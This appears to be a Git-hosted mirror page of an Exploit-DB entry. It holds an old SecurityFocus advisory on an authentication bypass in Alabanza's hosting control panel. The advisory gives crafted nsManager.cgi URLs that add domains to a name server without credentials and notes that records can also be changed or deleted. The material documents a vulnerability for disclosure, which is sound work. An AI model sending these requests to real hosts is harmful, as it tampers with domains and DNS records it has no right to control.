bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/remote/20238.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/1710/info
Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.
Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.
Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).
To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):
http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm
Accessing the following URL:
http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
will display a page stating:
"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!
Please click here to go back."
From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.
Reference in a new issue View git blame Copy permalink